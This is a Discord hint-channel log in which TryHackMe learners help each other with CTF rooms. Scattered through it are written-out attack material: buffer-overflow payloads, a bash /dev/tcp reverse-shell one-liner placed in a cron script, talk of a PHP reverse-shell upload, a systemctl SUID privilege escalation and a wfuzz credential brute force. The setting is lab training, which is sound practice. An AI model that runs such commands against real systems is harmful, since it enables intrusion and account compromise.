#room-hints

Yes.

Ok, thank you very much

Very much?

May I have some help with C?

I am trying to 0x00000000004006bc <+54>: call 0x400550 <execve@plt> call this function by overwriting the RIP register.

Here is the exploit I'm trying to develop: run < <(python -c 'print("A" * 32 + "BBBB" + "CCCC" + "\xbc\x06\x40\x00\x00\x00\x00\x00")')

When I run this, I get: $rip : 0x4006bcc2 and the RIp register gets filled with this, instead of 0x00000000004006bc

Any tips on what I'm doing wrong?

run < <(python -c 'print("A" * 32 + "BBBB" + "CCCC" + "\xbc\x06\x40")') this payload results in: $rip : 0x7f004006bcc2

I'm trying different thing. I'm not so great at C/low level CPU/MEM stuff

run < <(python -c 'print("A" * 32 + "BBBB" + "CCCC" + "\xbc\x06\x40\x00\x00\x00\x00")') If I send 4 more bytes, I get rip : 0x4006bcc2

I can't figure where this extra c2 is coming from at the end. Where is this byte coming from?

Which THM room is this for?

I calculated the correct exploit the first time around. I tried the exploit in python, and it handles null terminators differently somehow. I tried it in ruby and the same exploit worked. 40 bytes to reach the stack pointer and then inject the vuln function memory address

Sigh.

That's great and all, but which room is it?

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@

$  python -c 'print("A" * 40 + "\x86\x06\x40\x00\x00\x00\x00\x00")'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@```

🤷‍♂️

You don't know which room on THM this is for? 🤔

If it's not for a room in THM, then you'd more than likely get answered faster in #programming

This channel is for room hints on TryHackMe.

https://tryhackme.com/room/dearqa Now that I've got the exploit, I'm trying to send it to the service on port 5700, with a time delay of 2 seconds so the prompt has time to show up, but the input doesn't seem to be going through. I don't need a hint yet. I should be eventually able to figure this out.

Finally figured it out. Lots of trial and error! Got it.

No hints for 3 days

oh okay

so i'll delete my msg ahah

Yeah, thanks

I find a CALL to gets() function in the reversed source, I see it tries to write to a 20 byte buffer, so I send 28 bytes, 20+8, plus additional 4 to go past some memory locations, so 32 bytes, plus the payload, and I can put arbitrary data like AAAA or BBBB into the EIP register in the CPU but as soon as I try to inject a memory location in hex, it starts showing some random bytes I have no idea where they're coming from.

If you look at where it shows up, that's in the EBP register, BBBB in the register, which is the next instruction pointer. If I can write this with the memory location of the next instruction I want to execute, I can hijack the process and take control of the system. I just can't seem to inject a memory location there. I'm missing something.

If I put 4 more bytes, CCCC before the memory address, CCCC shows up in EIP. So I think we need to write over the EIP register with the memory location. So I send the payload without the CCCC, and I get totally different values in the EIP register

https://i.imgur.com/f0hhech.png

https://i.imgur.com/e38UC2T.png

run < <(python -c 'print("A" * 28 + "BBBB" + "CCCC" + "\xf7\xc4\xc8\x30")') Here is the payload. When I send this, I see CCCC show up in EIP register. Anytime I overflow the buffer, gbd says, memory in the EIP register cannot be accessed.

So we know it's 32 bytes + payload.

So I send

run < <(python -c 'print("A" * 32 + "\xf7\xc4\xc8\x30")')

And I get totally incorrect bytes showing up in the EIP register. I expect to see F7C4C830 in that register.

What am I doing wrong?

┌──(kali㉿kali)-[~/tmp]
└─$ ./pwn_me
Binexgod said he want to make this easy.
System is at: 0xf7c4c830

So this is the location I need to set my return pointer to.

It says the system() function is located at this address. system takes a char argument which is a command to launch, so we can launch it with system("/bin/sh").

But I can't seem to get the memory address of system() info the register. Any tips?

Which THM room are you working on?

https://tryhackme.com/room/binaryheaven

I don't want to look at the write-ups. I just need to figure out what I'm doing wrong in general. This happened with another task as well.

When I try to overwrite the EIP/RIP register, if I put AAAA in there, 0x41414141 shows up in EIP/RIP. If I try to put \x77... etc. in there, it shows the totally wrong bytes instead of the memory location I'm tryingn to inject with the payload.

I know some write up said to use pwntools and code a little exploit in python, but I'd like to try to attempt this manually in gdb with a payload.

I need to understand why the wrong byte show up in the register.

That's where I'm stuck.

This is the one room I haven't done, I can't be of a help, yet.

Pwntools just automate things, but I need to trigger this manually using a payload so I can understand more.

This is for Task3

Yeah, I can understand that, I don't mind using automation when I can understand the theory behind what it does.

See, I'm thinking, you can't just make the return pointer point to the system() function offset. That will launch system() sure, but system needs an argument, in this case /bin/sh, so we need to push this into the stack before a CALL to system. I'm not sure how I would do that using a payload.

This does seem like where you have to chain a few different things together to get this to work.

Also, file reports it as a PIE executable, so it's going to randomize function locations. So that's another thing I have to learn to work past.

So maybe the payload needs to be different. We need to inject the argument "/bin/sh" into the stack, as well as overwrite the return pointer.

https://tryhackme.com/room/binaryheaven Task3: Every single write up suggests to use pwntools. Is it not possible to exploit this with just the payload?

https://github.com/Gallopsled/pwntools-tutorial/blob/master/rop.md It is NX enabled. ANd PIE enabled. ROP is required

room name : Hunt Me I: Payment Collectors
how can i find file share , any hints , searched process , file created and anything to search ?

I'm working on the Tech Support room (https://tryhackme.com/room/techsupp0rt1) and stuck on initial access. I already have a user on the || Wordpress site (ran wpscan and did not get a valid password yet) and SSH (but didn't attempt to brute force it yet). || I enumerated the site and it wasn't going anywhere. I've looked at the || test page || mulitple times, but not getting any direction. I was hoping someone can give me a nudge on what I am missing, but don't give me the next step directly.

https://tenor.com/view/brazil-miss-j-alexander-maracas-carmen-miranda-brasil-gif-23365895

What's the dance? 😄

Maracas dance? 😅

Samba 😂

Will try to check it again. Thanks!

Gave +1 Rep to @lucid junco

Im working in Wreath Room. on step 17 when i put in ./nmap-USERNAME -sn 10.x.x.0/24 -oN scan-USERNAME, I get an error message stating: .nmap-USERNAME: line 1 syntax error near unexpected token 'newline' and ./nmap_USERNAME: line 1: '<DOCTYPE HTML.' . Any idea why this is happening?

Try this command nmap -sn 10.x.x.0/24 -oN scan-USERNAME

In your current command, you are trying to execute nmap-USERNAME located in your current directory.

Thanks will try

Gave +1 Rep to @tropic garden

how do i find the _______.ticket dir in LianYu

You can use || gobuster, dirsearch, dirbuster || to name a few.

i did use the small and big.txt wordlists. with the extension .ticket . still nothing pops up .

You need to add || -x ticket in gobuster || or || -e ticket in dirsearch ||.

yes i already did that.

Can you share your complete command here?

im trying again with big.txt : ||gobuster dir -u http://10.10.125.158/island/2100 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -x .ticket||

nvm found!

Need help with New Hire Old Artifacts room, on the another malicious binary question. I am looking at the binaries started from AppData and have excluded the previous 2 binaries. Have uncovered few malicious but none of them seems to the answer. What am I missing?

Can anyone help me with Vulnversity? Got to the escalation part, using GTFObins with /bin/systemctl (according to the answers, this should be the way). So far i didn't manage to elevate my rights, what did i do wrong?
sudo install -m =xs $(which systemctl) .
sudo: no tty present and no askpass program specified
$ ./systemctl link $TF
/bin/sh: 20: ./systemctl: not found
$ ./systemctl enable --now $TF
/bin/sh: 21: ./systemctl: not found

You should type /bin/systemctl and not ./systemctl as it is looking for the binary in your current working directory and not where it is actually located (/bin vs pwd).

Or just systemctl, as /bin is usually one the $PATH

Was the solution, thanks!

Gave +1 Rep to @tropic garden

I'm working on the Oh My Webserver room (https://tryhackme.com/room/ohmyweb) and stuck on the || docker escape step ||. I tried the steps outlined in the Hacktricks page, but nothing seems to work. I'm already the || root || user and was wondering if someone can give me a nudge. Many thanks!

I tried your ctf but no success so far. sorry

No worries. Thanks for trying though.

|| Try using a script for it instead if you tried following by manual ||

Got it. Thanks for the tip. Will try to work on this box again.

Gave +1 Rep to @young gulch

OWASP Top 10 Task 11 first question " Try to reset joseph's password. Keep in mind the method used by the site to validate if you are indeed joseph." through a VM I open the given IP address and once I arrive at the given site where the login to the THM Note Server is theres no "Forgot Password" option. Any assistance in this matter is greatly appreciated

post/multi/recon/local_exploit_suggester:8000 - Msf::OptionValidateError The following options failed to validate: RHOSTS | Getting this while running the command ; run post/multi/recon/local_exploit_suggester ; in ICE
HELP!

Anyone ?

LHOST?

Sorry ?

I solved it thank u

anyone can help me out in Hydra? none of my commands seem to be working for the room

Are you using the attackbox or your own VM? What commands specifically are you running and what error messages, if any, are you getting?

my own vm

Is your VPN connected?

yes

let me double check just to be safe

omg i bet its not rofl

not connected .... lmao

thanks bro

haha, np

thanks @green sedge

Gave +1 Rep to @green sedge

Got some problems with content discovery .Can somebody help me. I can´t find the answer to exercise 3.

What have you tried so far

I have tried downloading the file but i cant open it

Question on tryhackme windows forensics I cannot find the following path via registry explorer SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

I can only find SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\

I am also in the correct user path here:

not sure what the difference is but I forced regexplorer to open up the .dat file at the same time as the log1 && log2 files and that fixed it. Not sure what the best practice is?

Does someone know if the room is working? It seems that the shell script is not executed regularly.

Which room is this?

Ah fugg, copy paste failure. Anonymous

https://tryhackme.com/room/anonymous

Is it working now?

I just forgot to post the name in here. I tinkered yesterday evening several hours withit, but didnt manage to get the shell executed again.

Permissions were set aswell.

What have you tried thus far? Or which specific step are you stuck on when trying to get a reverse shell?

I mounted the FTP Server, so i can edit the clean.sh added a reverse shell command on top. Which did not work out and the log did not get any new entries anymore.

I reset the machine and made the script to send me a ping and tried to capture it with a tcp dump to ensure its running.

After the second reset, i added a timestamp to the output of the script, so i could see new entries in the log.

It looks to me like, the script doesnt get executed. Am i running in a deadend?

I made sure everytime, the file had the permissions to get exexuted.

What is the exact payload that you used and what does it look like after updating || clean.sh ||?

Also, I don't think you can edit a file using ftp as its purpose is file transfer only. With that said and taking into account the file permissions, what can you do to overwrite the || clean.sh || to include your payload?

I was using bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 with my ip. Nc listened on that port aswell. Firewall was offline. Running the script on my pc local resulted in a working shell.

You are right, thats why i mounted it with curlftpfs

This way i can edit the permissions

You don't need to edit the permissions as it can still be executed.

What are the file permissions in || clean.sh ||?

rwxr-xr-r

I meant in the ftp server. Can you do ls -la when connected to the ftp service?

Running dir shows you the file permissions aswell

Either will do, what was the permissions?

hi

Hello

im new to cyber cycurity and ethical hacking

someonecan helped me to cuntinue Try Hack me Agent Sudo CTF room

What issue do you have?

Hey @tropic garden , can I DM you?

Sure.

Who is TryHackMe's HTTPS certificate issued by?
Answer format: **

pleaseeee

help me

Have you tried checking it in the Internet first? Also, what have you tried thus far?

Follow these and you will see certificate informations (:

need some hint please - "Walking An Application" Task 3, the 1st Question "What is the flag from the HTML comment?". I inspected every html page. Some have the comment mentioned, some do not. But nowhere have I found a flag. The other questions I found without a problem.

the Hint says "Make sure you go to the link mentioned in the comment." But what comment?

There is a directory here that you need to browse into if you look at the comment carefully

yes, but that is the directory listing flag what you mean, isn`t it?

No, look carefully at the first comment.

OK - I'm completely on the ball. Just to be sure - by comment do you mean the text in Task 3?

No, where would you find HTML?

the source code

so have a look in there.

You're not looking for a comment, you're looking for a link.

OK - let me check. I was looking for a commend in the source code

but the question is "What is the flag from the HTML comment?"

You follow the link. 🙂

OK - I got it. Man - I totaly oversaw that link.

Thanks

Help? Im using a Kali VM for THM and enjoying it, but, after downloading seclists, I'm finding the THM attack boxes run them a million times faster than my VM - 2 requests per second. Any help would be awesome

You're on the same network on the attackbox.

Im connected to the VPN. Why would that make ffuf so slow?

It's connecting to the website through hops

And thats why its so slow?? Ffuf is at 22 minutes to get through a 10k wordlist, which the attack box does in seconds. Thanks for the help btw

Gave +1 Rep to @lucid junco

Vm could be under resourced, or over resourced.

Its a Virtualbox VM, 4MB memory, 4 cPUsand 80GB storage

4mb of RAM?

Yeah I think so - cat /proc/meminfo says 4006536 kB

Why so low?

Just going by what the guide said when building the VM. Its seemed to run well so far but THB I've not used it for much hard work yet. So up the RAM and see how that goes?

How much RAM does your host have?

Kali should have a minimum of 2/4 GB of RAM.

Isn't this 4 gigs of ram?

host has 16GB RAM

Give it 6-8.

Done - and it started off saying 8000 requests per second, then dropped back down to 2

Im so sorry - I just turned ff Google VPN on the host machine and request rate instantly shot up on the VM. I'd love info on why if people have it? Other than the additional hops the VPN makes each reuest do?

New to Discord sso sorry if I'm posting in the wrong places, but thanks to scrubz for the help. Chuffed 👍

It's not good to double up on vpn

what I´m doing wrong at https://tryhackme.com/room/subdomainenumeration Task 6?

You are targeting your Attackbox and not the attached VM.

It does require uppercase letters

so I have the wrong IP at http://MACHINE_IP ?

If you used git clone, I think it will be required.

Yes, you covered it in the initial image, but it was still mentioned in the ffuf command summary.

OK - thanks. I will find out 😉

Gave +1 Rep to @tropic garden

Did I understand correctly that MACHINE_IP is the IP address of the web server?

You need to start the attached VM by clicking on the green Start Machine button in Task 1 if I'm not mistaken.

If its populated with 10.10.xxx.xxz

Otherwise if it says Machine_ip no

Wrong Ip.

That ip is your attackbox.

OK - then I think I have another basic question. What is the difference between starting AttckBox or Start Machine?

Oh - I think, I got it ...

Attackbox is your attacking.

Start machine with the green button is the target.

OK - so that are 2 differnt machines?

I see - now I got an IP adress in the ffuf command where I had MACHINE_IP

thanks

Gave +1 Rep to @lucid junco

are there any hints for the room "The Server From Hell" on how to read root.txt? i tried almost everything i could search up but nothing makes sense to me anymore

never mind I was finally CAPABLE to do it. 🤦

Heyall! I have a little question with Network Services room, Task 4 Exploiting SMB.
I have been granted access, but I cant seem to read or open any of the files.
Am I missing something? What command should I use?

Are you refering to working_from_home.txt?

yes!

Try

get "working_from_home.txt"

Yes! Thank you!! Didnt realise I needed to read it on my machine! I was hoping I could just read it in the terminal 😅
Thanks friend!!

Gave +1 Rep to @lucid junco

🙂 No worries, happy hacking!

Any help with mother's secret room in security engineer path ?

I mean an explanation for the whole room

🤔

What are you interested to know?

Exactly...

The whole concept of the room. Does this room add useful knowledge to me or it is just a fictional scenario to highlight the importance of SAST and DAST ?
The main point is: is this room worth ?

Yes, the room is worth it

anyone do Valley? I need a hint and I don't want to spoil anything by opening up the writeups.

I crawled the website with gobuster and found the note.txt that says "stop leaving notes on the website" but after looking around, that's the only note I could find.

I feel like something is hiding in plain sight and i'm overthinking it

If I remember it correctly, you only need the name from it.

I won't be able get on my VM until maybe in 3 or 4 hours.

This is one of my to-do lists. 😅

It's confusing and i need solve it to finish the security engineer path

I just came back to my notes and it is indeed a clue, not a user though. You need to find what that note is referring to.

Need hint for the room Chocolate factory. I have the key , cracked the password. . but I don't know how can I bypass the login page. Tried both xss and sqli . .what am I missing?

Which key do you have?

The first key .

I'm looking at my notes and I'm still having to reconstruct or figure out the sequence of what I did. 😅

Can you share what key do you have?

Is this for Charlie ?

Aaahh... I get it now. The key file I got from the || key_rev_key || binary is just one of the answers. I can't remember what it was used for. 🤣

You don't need to bypass it. Have you enumerated what services are running on the box?

Yes ftp . . with that file how I found the password for Charlie.

Have you tried using those credentials to login the web page?

Dang I was making a typo while entering the password. Why I didn't noticed that 😭😭. . logged in ! Thank you.

Gave +1 Rep to @tropic garden

It happens.

that was another avenue I was thinking. Thanks!

Gave +1 Rep to @tropic garden

In easyCTF room. What is the syntax for the third question? I did the nmap scan and i found a lot of CVE's which one should i choose?

u mean simpleCTF?

Lol, Yes

for that did you used gobuster tool?

Hey guys, I'm working on ContainMe (https://tryhackme.com/room/containme1) and I'm stuck on the privesc part where I'm supposed to supply the binary some value.

I've already used cutter, but I'm still having difficulties understanding the commands and connecting the dots. Any resource you can recommend to read on?

You mean a simple directory enumeration?

yup

I found it
Now the next problem is that the exploit python code could not find the module "termcolor" , any hints?

pip3 install termcolor

there you go!!

The code is written in python 2 and python 2 could not find the module despite being installed in the python 3.11 directory.

yeah sorry

then pip install termcolor might work

Tried this one if I remember correctly, but it didn't work saying it is already installed and pointing to the python3 library.

pip2 will work

Pip2 isn't available in my local machine (kali Linux virtual box) i will try to use the attack box

Indeed

I tried to make chatgpt to convert the code from python 3 to python 2 without a useful result

Hey guys, I'm working on All in One (https://tryhackme.com/room/allinonemj) and stuck in the step where I saw a hidden page || hackathon ||. It says "I hate the smell of vinegar" or something along those lines and saw two words/phrases that are comments of the said web page. Any nudge on what to do next?

try this command 2to3 46635.py -w

this will work for sure i used this command to get the script working

Hello, friends, Can you give a little hint on ||how to interact with docker|| to get 4 flag. (box - dogcat)
||I couldn't find the binary "/bin/sh: 17: docker: not found"
They advise me to find "cron" tasks, but I didn't find anything with a cron.
I checked pspy64, I didn't see anything.
You cannot mount disks.||
What else can I see or read?

Let me check my notes

Should be a scheduled task lying around

I assume you're in the container?

Look for ||something that a task might actually run||

Yes, I'm in the container, but I haven't found any hints of "cron".
The only thing I found is:

I checked through the "pivoting" there is something interesting, but there is just the same site with cats and dogs

Look around the filesystem

Think about what Cron jobs are most used for

Any hints on this?

Or this? 😅

It didn't work on my virtual machine then i tried to use the attack box and tried to install 2to3 but there wasn't enough space (lol) then i used an api from the python website to convert from python 2 to 3 and finally it worked, Alhamdullelah

I'm in the right direction,|| I think I found a script that runs docker, I add code to the script for the reverse shell.
Or did I still not understand anything, and I need to look for a way to get out of the container in another way?
a cron task for a container backup?||

Sounds like the right track

Now it remains to understand ||how to make the script run from root||, it does not automatically start😅

Doing Vulnnet Internal (https://tryhackme.com/room/vulnnetinternal) and stuck on the last flag. I already have a user || sys-internal ||, but I'm not sure what service to exploit next. I already got useful info or flags from the following services: || nfs, smb, redis and rsync || I also tried to re-use the passwords that I got from the other services, gain RCE via || redis || and brute force the user login, but didn't get any helpful result. If anyone who has completed the room can give me a nudge? Thanks.

You need to find another service.

The hint is in the room’s name.

Got it. I have other ports / services identified in my nmap scan. Will try to go through it again.

Thanks.

Gave +1 Rep to @young gulch

Just to add, I tried looking at || java-rmi ||, but didn't get any useful info as well.

If you haven’t completed it yet, its a || web || service.

Thanks! I re-ran my nmap scan again yesterday as there is a port that shows up as closed or filtered in my notes, but it doesn't seem to be it. I'll try to enumerate the target again.

Gave +1 Rep to @young gulch

hey help me in rootme

unable to upload

displaying connection was reset

tried all valid php extensions

Can you share a screenshot of the error you are having?

#878393611929129000 message

The connection was reset

The connection to the server was reset while the page was loading.

The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer’s network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the web.

Did you try to upload files with other extensions?

yes

with .php .phtml .php3 .php5 etc

And the error is the same for all? Have you tried to restart the target VM?

yes restarted but still same error

idk why

I'm not in front of my machine so it will have to wait before I can check on my end.

Can you send a screenshot

Can you reach the IP?

yes i can

still unable to upload

In startup also i am unable to upload via ftp

displaying 100% but after that nothing happens

on website the files have 0 size

What payload are you trying to upload?

php reverse shell from pentestmonkey

Which room are you doing?

startup

Are you definitely adding a file with information?

yes

||to gain shell access||

||only option||

according to me

I'm just double checking the file you're uploading isn't empty.

just renamed this file https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Did you change it at all?

no only thing that i've changed is ip address

if i remember correctly i faced the same issue then @tropic garden told me to use the raw file but unfortunately the raw file wasn't loading on my end try the raw file once it might work ..

ok let me try

its working now

What worked for you?

raw file I guess

I want to solve lab Theseus and I found this TGUE?O·S·K·MTUEGI·SYENFE·TOI···SRO·T·SF·OYT···O·T·KUMH·I·AE·NMK·· this ctf give me no hint to solve this can any one help me to provide a hint

I haven't done this room yet, but the room creator put a note in the room (so I'm not sure if anyone will give you a nudge on this):

"Please don't release any walk-through or write-ups for this room to keep the challenge valuable for all who complete the Labyrinth."

I can say it's an ancient cipher

can't remember how I even found it though, but you're in for a ride

next day it worked just fine

Lazyadmin room
Any hint on how to get initial access ? I did an nmap scan and I'm doing gobuster. I found the content directory and then nothing useful.

hi guys.. where can i go to ask a question about the regular expressions module? i have an answer that works, but not getting accepted

and i am plumb stuck on how else to solve it

Did check out all of the files in ||/content/inc||?

Mmmmm, i will

Is there a faster way than the gobuster tool ?

A faster way to what? Find subdirectories? There are other tools out there for that but I am not sure which is the fastest. Fuff is pretty good though

I guess you have to take into consideration as well your network speed and the resources of your target as you don't want to cause a DoS scenario and have to end up restarting your target.

Can someone help sniff-test https://tryhackme.com/room/shaker
I can't get the revshell to callback (and the designer even confirmed 'that should work'...?) 🤦‍♂️

I'll give it a try tonight. Have you tried restarting the box?

There is an attempt at mitigation though

I've tried this on multiple occasions (at least 5-6), so yes.
I saw the Hack detected error in the logs and worked around it. I can see the resulting LDAP and HTTP calls, but no revshell/RCE

Wondering if there's a resource issue, I normally tested on the non sub box

I'm assuming you're talking about the initial foothold yes?

shell works on my end

you already fixed, it some times there is issue with the ftp, when i try from my kali machine, even changing mode was not helping and with attack box i was able to do it instantly

Any help with the overpass room ?

On which specific area are you stuck at the moment?

I did the nmap port (80 and 22 ). Then I did gobuster i found an img directory that contains 3 files and one of them contains a hidden data which i could not extract because i need a passphrase then i moved into the admin directory i tried some basic sql commands then i surrounded. I now have a group of directories encoded in url and when i navigate to i receives an 440 error

Look clearly at the javascript code embedded in the page.

The print statement?

No. Its more obvious than you think.

im stuck on the root password of operating system security room

While logged in as Johnny, use the command su - root to switch to the root account. Display the contents of the file flag.txt in the root directory. What is the content of the file?

when I am running su -root its asking for the password i have tried johnny's password but its not working

The question right before that asks you what the root password is, did you get that answer?

The tasks guides you through it step by step, how to get the password and how to switch to the root user, I would suggest rereading the task and questions carefully

Are you copying and pasting it correctly? Without any extra spaces at the start or finish? Also try not to post answers to questions here without at least putting spoiler tags around it like this "||" on either side of the spoiler

yes it worked by copy pasting but before I was typing it the same password but I was wondering why it was not working before .

¯_(ツ)_/¯

Probably you were tying it wrong without realizing it

for me this didnt work but in my opinion it is right.

https://tryhackme.com/room/passwordattacks

in linux it worked perfectly

No, you're missing 5 characters.

bruh i got it.

I thought THM@% had to appear in the command and not in the list. my bad

After reading a writeup I have found the file on Task 4 of https://tryhackme.com/room/rrootme. My question is why is it it weird that this file has SUID permission and how could I have known that out of 52 files this is the one I was supposed to be looking for?

You can run a command like find / -perm -u=s -type f 2>/dev/null to find any files that have a potentially exploitable SUID bit set on them

I have found the file, I have 2 questions though:

1. Why is it weird that this file has SUID permission

2. Out of 52 files that find -user root -perm /4000 2> /dev/null outputted, how should I have known that one particular file was the one I was searching for?

So when you have the SUID bit it gives temporary permission to the user to run the file or program. You should read up on SUID it's gonna be very helpful for your future privilege escalations. You can easily check for a commonly exploitable file by looking at something like - https://gtfobins.github.io/#+suid

I suppose it is just something that I have to be exposed to more frequently to develop the intuition. Thanks for the feedback.

Gave +1 Rep to @heavy crest

When I was first starting out, I would go through every SUID binary (after running the find / -type f -perm -4000 2>/dev/null) and look it up on GTFObins. It took forever, but after a dozen times doing that you essentially end up just memorizing all the "normal" ones, and so it'll jump out at you whenever you see something that isn't typical.

What suspicious tool is used by the attacker to extract a juicy file from the server?

I will make some Anki flash cards 😂

Hi, I'm playing with the "Mustacchio" machine here and I can't ||figure out how to use the XSS technique, do I still need to authenticate on the administrator's page?
If so, what is the method of password selection, brute force or data collection from the site.
I used "cewl", but not a single word was suitable for the password||. Where can there be a hint to get into this panel?

You don't need XSS for the admin page. You will need || XXE || though after logging in.

I don't have my notes with me, but you will have to || brute force some code to get the password ||.

Can anyone help me with the Kenobi room? Task 3

So did anyone else had trouble with AoC - Hydra is coming to town? I did the task in my VM and it just cracked three random digits, 000, 001,002 etc.. Decided to try with the attack box and all of sudden I cracked the correct password.

Hi I'm on task 2 of Steel Mountain, the last question, and I'm having trouble running msfconsole. Anyone willing to help?

What issue are you having with msfconsole?

There was a discussion on this in the #1174347459116417054 channel which you will find if you do a search in the history.

Completed Kenobi, in Steel Mountain now and having a similar issue. Can't get meterpreter running. Don't know if its a user error or not.

switched from attackbox to VM

For some reason after turning off "ufw" i got a meterpreter session. Any ideas as to why?

oh.. it must be blocking any reverse shells being sent to you machine? before turning it off, would you know what the setting is?

The setting of ufw?

Yeah.. it may only be permitting traffic from certain ports.

Anyway, its resolved now, but do take note of it in case you encounter similar issues in the future.

I'm further along in the room and haveing troouble getting a reverse shell on the machine. The response from the machine when trying to start the process says "The file or directory is corrupted and unreadable." This is in the third tsask of Steel Mountain.

Please help

last question of third task of Steel Mountain

We'll have to wait for other to chime in as I can't access THM at the moment.

Or I can refer to my notes. What is the exact question again?

I thought you received the reverse shell previously?

I feel like I'm almost there but I keep getting a file is corrupted or unreadable error.

Have you already placed or uploaded your payload (assuming you followed the instruction in the room) in the said directory? Can you do a dir?

yes I have and get no respons from nc when running the above

What is the exact command you used to generate the payload and listener?

Used the msfvenom command from the room to get the Advanced.exe

Does that help you help me?

Have you tried to run the sc stop servicename command in the Advanced SystemCare folder?

Yes

In the screenshot, you ran it in the IObit folder

Yes correct

Do i need to change the permissions?

Can you run it inside the Advanced SystemCare folder?

You don't need to if I remember correctly

just tried it and still no nc listener response

were you able to stop the service? Or you still got the error message?

didn't try stopping, only starting. No error message with starting, but no nc response as well.

You need to stop the service first before starting it again to trigger your payload

I'll try it

I've been in this room for nearly 5 hours

its just this last flag and I'm' done. I'm exhausted and want to get Day for of Advent done as well. Argh kicked out of the meterpreter session. back to the grind

Thanks for being so available and responsive btw. I see you in the chats a lot

Gave +1 Rep to @tropic garden

If there's anything that isn't clear, just let me know and I'll explain it to the best of my abilities. Just helping fellow learners in the site.

Righteous!

Nah. Just trying to help out when I can

I was following this walkthrough https://www.youtube.com/watch?v=4JYP5xQ9FsY&t=911s and got all the way up to the 15:09 mark and could never get nc to listen

The Service AdvancedSystemCareService9 is currently running thus, for it to trigger your payload, it has to be stopped. Now leveraging on the 'unquoted service path vulnerability' we will make the service run our Advanced.exe instead of the legitimate AdvancedSystemCareService9 as the OS is not looking for an absolute path to run or trigger the service from. After placing our payload, Advanced.exe, in the IObit folder, we will run it again to have the OS run Advanced.exe.

I will have to try this tomorrow. Thank you for your service

Gave +1 Rep to @tropic garden

I will let you know the results

Hi guys I need some help on BruteIt room were I have ran hydra to get the password for admin running against rockyou.txt and non of the passwords work to get into the admin webpage

have you considered trying another wordlist?

Yes I have tried rockyou.txt & unix_passwords.txt

I'm going to try fasttracktxt

It should be in rockyou.txt? What was the exact command you are running?

Sorted it now thank you and rooted the box thanks guys.

Gave +1 Rep to @tropic garden

hi could someone help me with the days of advent day 3 , I can't seem to get the username and password

For AOC2023?

yeah 🙂

You don't need to find a username and password just need to crack the pin number

What are you having trouble on?

sorry day 4

I have followed the practical challenge and it shows on the end result after using wfuzz that I should have results like 'Redacted' and process 60372 items whereas on mine my process requests is 9361 and there is no output showing a username and password

Ah with wfuzz try adding -o raw to the end

Think it's a big with wfuzz

with the last command?

Yeah sorry with the wfuzz command

wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.230.124/login.php -d "username=FUZZ&Password=FUZ2Z" -o raw

nice one thats sorted it 🙂

thank you

Nice one!

Hi again - I am on day 5 and I got access to the backup tool and the readme.file and then my VM disconnected and now it says no such file exists in tools\backup

Anyone else have trouble getting a meterpreter going in Steel Mountain?

"Keep getting an exploit was complete but no session was created. " error

edit: turned off my firewall and was able to get a meterpreter session

You wil have to restart

Did anyone help? I’m having trouble with this same question and from the guidance I’ve received, my coordinates from exiftool are correct the street names I keep trying are not

Don't turn off, add an exception to allow inbound connections on (e.g.) 4444 💡

thank you! this worked for me as well when I was having trouble with the same thing as SpiderShan

Gave +1 Rep to @heavy crest

can someone tell me how could i decode a base 64 encode mail in the format of email2.txt

Cybercheif?

yes but how to use i search on google and didnt figure it

hey, could someone help me with day 7 - "What status code is generated by the HTTP requests to the least accessed domain? " . I have done all the others but cannot figure this one

of 3 #1174347459116417054?

yes 🙂

well ask in #1174347459116417054 so XD

oh my bd i didn't see that room

and maybe u could verify u use /verify

I always do the same

File inclusion room
Eight task (challenge)
Where to find the flag after accessing as an admin ?

challenge 3?

2

can you tell me what you have done so far? will tell you accordingly

Curl -X POST domain -H 'THM=admin' -d 'method=GET&file=/etc/flag2
I ended up having the admin page then i tried burpsuite and i ended up having the same result

u are searching in the wrong dir

:0

try to use the dir that you used in the challenge 1

🤔🤔

Is the service you are pertaining to || zeus-admin ||?

Should be something related to CICD

can I get help for sq, q4?

Oh.. no hints until the 28th December.

@rose umbra
What about flag3 any hint ?

don't use brup for that use the curl command

method used will be POST

I love you

Any small hint about Valley room ?

which part in said room???

I did an nmap scan, gobuster, checked the source code, checked the cookies and i used hydra to find a username and a password but nothing useful i guess

Should i do a gobuster scan for the founded directories ? Or should i download the images and check for any encoded information?

yeah recommend more enumeration

including into directories that you have found

hi

can you hint me more

Use some Steganography Tool.... The passcode is: CCBEJSJWRQ Use cryptography 26*26

i have a file jpg

but i can decode it

can you help me, please

for which tryhackme room is this???

hmm no

it is ctf in another

sorry we can't help with none tryhackme ctfs... especially still ongoing ones

Flag format: CyberClass{text}

hmm, can you hint me how to decode a picture have raw data, hint and something to decode and get a flag?

I can help you read about steganography methods in wikipedia ie.

I have a problem with room network services task 7 last question its a flag so i need a hint not a googled anwser. I get to admin account using hydra but most of files owner is root, i try hydra again but i'm afraid root not using ssh and here i'm, any ideas maybe i shoud start searching method to priv escalation without cracking password.idk.

Yeah, my Parrot box is doing the same thing.

And Hydra gives me a different pin every time I run it. And none of them work. Any ideas?

can you give me this link?

Last word, maybe try lsb.but it eot, cause it offtop, maybe it this maybe not.jpg maybe hard to write aprser but still rules are the same , if tahst is lsb, it can be smth simpler...

You knwow you a are on thm server , you seems dont even have account on this site...And wants help in some Other Ctf it's not okay to me. and its not ok if iget banned beacuse off that.

try LSB, give ansr if thats it... and not do smthng like thath in feature...

I'm still in room Valley. I found the login page what should i do next ? Is there hidden data in /static/4 ? Or should i move into burpsuite?

You should continue looking or enumerating the directory (and not the file specifically).

i will look at it when i will be ar pc.i feel that rather find anwser on my own then on the forum... but i try one more time network services 2 last quetion flag, have admin privs and ssh but flag is in file owned by root who not use ssh so i can onyl watch ir name and getting nervous because it 4 day. So if someone renember if i need priv escaltion or next better password cracker but even if i have acces to read shadow file it still uses yescrypt if linux is new. And its hard to crack.so i must esc privs without crack pass i think.

Walk through the login page. You’ll find something soon enough.

Walking an Application room can help you here.

Good evening

can somebody give me a nudge for the Wonderland room

dms tho

